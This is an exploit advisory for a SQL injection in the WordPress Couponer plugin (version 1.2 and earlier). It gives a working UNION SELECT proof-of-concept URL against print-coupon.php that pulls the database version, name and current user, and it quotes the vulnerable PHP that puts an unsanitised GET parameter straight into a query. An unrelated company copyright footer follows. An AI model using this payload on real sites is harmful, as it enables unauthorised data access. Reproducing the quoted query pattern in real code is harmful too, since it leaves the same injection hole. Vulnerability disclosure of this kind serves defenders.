# Exploit Title: WordPress Couponer plugin <= 1.2 SQL Injection Vulnerability
# Date: 2011-08-31 |
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) |
# Software Link: http://downloads.wordpress.org/plugin/couponer.zip |
# Version: 1.2 (tested) |
# Note: magic_quotes has to be turned off |
--- |
PoC |
--- |
http://www.site.com/wp-content/plugins/couponer/print-coupon.php?ID=-1' UNION ALL SELECT 1,version(),database(),current_user(),5,6,7,8,9,10--%20 |
--------------- |
Vulnerable code |
--------------- |
$ID = $_GET['ID']; |
... |
$sql_get_coupon_id = "SELECT *, DATE_FORMAT(Expires, '%b %e, %Y') as Expires, DATE_FORMAT(Created, '%b %e, %Y') as Created FROM wp_couponer WHERE ID='$ID'"; |
$result_get_coupon_id = mysql_query($sql_get_coupon_id);
Copyright © hongdaChiaki. All Rights Reserved. 鸿大千秋 版权所有
联系方式:
地址: 深圳市南山区招商街道沿山社区沿山路43号创业壹号大楼A栋107室
邮箱:service@hongdaqianqiu.com
备案号:粤ICP备15078875号